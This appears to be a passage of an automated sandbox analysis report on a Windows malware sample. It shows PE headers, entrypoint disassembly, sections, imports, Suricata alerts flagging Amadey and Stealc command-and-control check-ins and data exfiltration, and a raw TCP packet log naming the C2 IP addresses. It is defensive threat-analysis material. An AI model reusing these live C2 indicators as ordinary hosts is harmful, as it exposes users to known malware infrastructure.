                                                                                        Time Stamp:0x649E5B46 [Fri Jun 30 04:34:14 2023 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:0
                                                                                        File Version Major:5
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:2d83a132aed8edaae5018374a3a97ff6

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        call 00007F91E84B5FC5h
                                                                                        jmp 00007F91E84B20BEh
                                                                                        mov edi, edi
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 00000328h
                                                                                        mov dword ptr [00428818h], eax
                                                                                        mov dword ptr [00428814h], ecx
                                                                                        mov dword ptr [00428810h], edx
                                                                                        mov dword ptr [0042880Ch], ebx
                                                                                        mov dword ptr [00428808h], esi
                                                                                        mov dword ptr [00428804h], edi
                                                                                        mov word ptr [00428830h], ss
                                                                                        mov word ptr [00428824h], cs
                                                                                        mov word ptr [00428800h], ds
                                                                                        mov word ptr [004287FCh], es
                                                                                        mov word ptr [004287F8h], fs
                                                                                        mov word ptr [004287F4h], gs
                                                                                        pushfd
                                                                                        pop dword ptr [00428828h]
                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                        mov dword ptr [0042881Ch], eax
                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                        mov dword ptr [00428820h], eax
                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                        mov dword ptr [0042882Ch], eax
                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                        mov dword ptr [00428768h], 00010001h
                                                                                        mov eax, dword ptr [00428820h]
                                                                                        mov dword ptr [0042871Ch], eax
                                                                                        mov dword ptr [00428710h], C0000409h
                                                                                        mov dword ptr [00428714h], 00000001h
                                                                                        mov eax, dword ptr [00427004h]
                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                        mov eax, dword ptr [00427008h]
                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                        call dword ptr [00000084h]

                                                                                        Rich Headers

                                                                                        Programming Language:
                                                                                        • [C++] VS2008 build 21022
                                                                                        • [ASM] VS2008 build 21022
                                                                                        • [ C ] VS2008 build 21022
                                                                                        • [IMP] VS2005 build 50727
                                                                                        • [RES] VS2008 build 21022
                                                                                        • [LNK] VS2008 build 21022

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2582c0x3c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000xcbf0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x240000x15c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x22f7c0x2300091351afea8a07ae71959e5299ad9799bFalse0.868603515625data7.724016513363016IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x240000x20060x22000e6370c67093db2035f8cea3a2d5337aFalse0.34823069852941174data5.37509743390153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x270000x122680x1e001cb4b07b91bba1d323c9b5571fd37e6bFalse0.11875data1.3088412754264982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tohi0x3a0000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .diducow0x3b0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x3c0000x206bf00xcc0008c7cba2cd17b018ba50ffdce6b70a71unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        DUKUPIREYAFEHO0x42cd80xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6010447273914463
                                                                                        RT_CURSOR0x438d00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                        RT_CURSOR0x43a000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                        RT_CURSOR0x45fd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                        RT_CURSOR0x461000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                        RT_ICON0x3c4a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.6092750533049041
                                                                                        RT_ICON0x3d3480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6872743682310469
                                                                                        RT_ICON0x3dbf00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7488479262672811
                                                                                        RT_ICON0x3e2b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7926300578034682
                                                                                        RT_ICON0x3e8200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5860995850622407
                                                                                        RT_ICON0x40dc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.7157598499061913
                                                                                        RT_ICON0x41e700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.7348360655737705
                                                                                        RT_ICON0x427f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8696808510638298
                                                                                        RT_STRING0x488900x15adata0.5028901734104047
                                                                                        RT_STRING0x489f00x1ccdata0.5217391304347826
                                                                                        RT_STRING0x48bc00x2adata0.5952380952380952
                                                                                        RT_GROUP_CURSOR0x45fa80x22data1.088235294117647
                                                                                        RT_GROUP_CURSOR0x486a80x22data1.088235294117647
                                                                                        RT_GROUP_ICON0x42c600x76dataTurkishTurkey0.6610169491525424
                                                                                        RT_VERSION0x486d00x1bcdata0.581081081081081

                                                                                        Imports

                                                                                        DLLImport
                                                                                        KERNEL32.dllInterlockedIncrement, ZombifyActCtx, FindCloseChangeNotification, FreeEnvironmentStringsA, GetModuleHandleW, GetSystemTimes, LoadLibraryW, Sleep, SetVolumeMountPointA, WriteConsoleW, GetAtomNameW, SetUnhandledExceptionFilter, GetLastError, GetProcAddress, OpenWaitableTimerA, LoadLibraryA, LocalAlloc, GetCommMask, OpenJobObjectW, CreateWaitableTimerW, EnumDateFormatsW, FindFirstVolumeA, AreFileApisANSI, GetConsoleAliasesW, GetNumaProcessorNode, HeapReAlloc, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, HeapSize, CreateFileA, CloseHandle
                                                                                        ADVAPI32.dllReadEventLogW

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        TurkishTurkey

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                        2024-07-24T07:19:38.000202+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35044280192.168.2.677.91.77.81
                                                                                        2024-07-24T07:15:37.409703+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in4989180192.168.2.685.28.47.31
                                                                                        2024-07-24T07:18:08.661667+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35023880192.168.2.677.91.77.81
                                                                                        2024-07-24T07:18:19.755505+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35026180192.168.2.677.91.77.81
                                                                                        2024-07-24T07:14:26.234982+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile4971880192.168.2.677.91.77.81
                                                                                        2024-07-24T07:20:17.398531+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35053580192.168.2.677.91.77.81
                                                                                        2024-07-24T07:18:38.447188+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35029880192.168.2.677.91.77.82
                                                                                        2024-07-24T07:20:57.367335+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35061580192.168.2.677.91.77.81
                                                                                        2024-07-24T07:21:20.351299+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35066980192.168.2.677.91.77.81
                                                                                        2024-07-24T07:22:31.548423+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M36232380192.168.2.677.91.77.81
                                                                                        2024-07-24T07:15:09.454365+0200TCP2856122ETPRO MALWARE Amadey CnC Response M1804981977.91.77.82192.168.2.6
                                                                                        2024-07-24T07:15:10.170230+0200TCP2044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M24982880192.168.2.677.91.77.82
                                                                                        2024-07-24T07:15:20.838324+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in4984780192.168.2.685.28.47.31
                                                                                        2024-07-24T07:15:30.869628+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in4986880192.168.2.685.28.47.31
                                                                                        2024-07-24T07:23:01.524203+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M36239580192.168.2.677.91.77.82
                                                                                        2024-07-24T07:14:10.315336+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in4971180192.168.2.685.28.47.31
                                                                                        2024-07-24T07:15:06.675856+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34981980192.168.2.677.91.77.82
                                                                                        2024-07-24T07:13:58.347176+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M36244080192.168.2.677.91.77.82
                                                                                        2024-07-24T07:20:01.267101+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35049680192.168.2.677.91.77.82
                                                                                        2024-07-24T07:18:49.091946+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35032680192.168.2.677.91.77.81
                                                                                        2024-07-24T07:17:36.813097+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35015880192.168.2.677.91.77.81
                                                                                        2024-07-24T07:18:52.003878+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35033380192.168.2.677.91.77.82
                                                                                        2024-07-24T07:18:45.991728+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35031880192.168.2.677.91.77.81
                                                                                        2024-07-24T07:18:25.919989+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35027580192.168.2.677.91.77.82
                                                                                        2024-07-24T07:18:34.725735+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35028680192.168.2.677.91.77.81
                                                                                        2024-07-24T07:14:12.138271+0200TCP2044248ET MALWARE Win32/Stealc Submitting System Information to C24971180192.168.2.685.28.47.31
                                                                                        2024-07-24T07:14:10.548452+0200TCP2044244ET MALWARE Win32/Stealc Requesting browsers Config from C24971180192.168.2.685.28.47.31
                                                                                        2024-07-24T07:18:07.105986+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35023680192.168.2.677.91.77.81
                                                                                        2024-07-24T07:17:59.986693+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35022280192.168.2.677.91.77.82
                                                                                        2024-07-24T07:18:52.187394+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35033480192.168.2.677.91.77.81
                                                                                        2024-07-24T07:20:06.804230+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35051180192.168.2.677.91.77.81
                                                                                        2024-07-24T07:15:07.767868+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile4982280192.168.2.677.91.77.81
                                                                                        2024-07-24T07:14:10.775126+0200TCP2044246ET MALWARE Win32/Stealc Requesting plugins Config from C24971180192.168.2.685.28.47.31
                                                                                        2024-07-24T07:15:12.965702+0200TCP2044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M24983880192.168.2.677.91.77.82
                                                                                        2024-07-24T07:16:07.959306+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34995180192.168.2.677.91.77.82
                                                                                        2024-07-24T07:23:04.667306+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M36240380192.168.2.677.91.77.82
                                                                                        2024-07-24T07:17:10.232766+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35009880192.168.2.677.91.77.81
                                                                                        2024-07-24T07:18:03.460371+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M35023080192.168.2.677.91.77.82
                                                                                        2024-07-24T07:22:23.897994+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M36229580192.168.2.677.91.77.82

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jul 24, 2024 07:13:58.347176075 CEST49674443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:13:58.347176075 CEST49673443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:13:58.659564018 CEST49672443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:05.427911043 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:05.427947998 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:05.428009987 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:05.428631067 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:05.428652048 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.249659061 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.249749899 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.254796982 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.254810095 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.255075932 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.256684065 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.256736994 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.256745100 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.256930113 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.300509930 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.452008009 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.452188969 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:06.452281952 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.452363968 CEST49710443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:06.452379942 CEST4434971040.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:07.956434011 CEST49674443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:07.956434011 CEST49673443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:08.269068003 CEST49672443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:08.937864065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:08.985764027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:08.985901117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:08.986838102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:08.991780996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:09.650543928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:09.650799036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:09.654838085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:09.659810066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.033930063 CEST44349705173.222.162.64192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.034216881 CEST49705443192.168.2.6173.222.162.64
                                                                                        Jul 24, 2024 07:14:10.315244913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.315335989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.353066921 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.357959986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.548310041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.548451900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.549026012 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.549081087 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.590965986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.595870972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.775007963 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.775125980 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.775378942 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.775392056 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.775448084 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.777168989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.777179956 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.777252913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.779155970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.779167891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.779227018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.781157970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.785991907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.968585014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:10.968739986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.996213913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.996213913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:10.996280909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:11.001872063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.001893044 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.001902103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.002852917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.002861023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.002876043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.002885103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:11.002893925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.138159037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.138271093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.395745039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.400759935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.582206011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.582364082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.582628012 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.582639933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.582669020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.582690001 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.584429026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.584443092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.584758997 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.586352110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.586386919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.586453915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.588172913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.588185072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.588195086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.588246107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.588263035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.590162039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.590174913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.590224981 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.592832088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.592905998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.666621923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.666687012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.667042017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.667054892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.667376041 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.668807983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.668870926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.671464920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.671515942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.671979904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.671991110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.672030926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.674078941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.674129009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.676249027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.676295996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.676774979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.676788092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.676798105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.676826000 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.676852942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.678981066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.679023027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.681354046 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.681396961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.681612015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.681622982 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.681647062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.681663990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.683763027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.683779955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.683805943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.683823109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.686204910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.686249018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.686738968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.686752081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.686785936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.686809063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.688688993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.688741922 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.691014051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.691061020 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.692404032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.692419052 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.692476034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.694983959 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.749180079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.749326944 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.749588966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.749600887 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.749628067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.749644041 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.751352072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.751394987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.754169941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.754226923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.754637003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.754650116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:12.754681110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.754692078 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:12.756627083 CEST804971185.28.47.31192.168.2.6
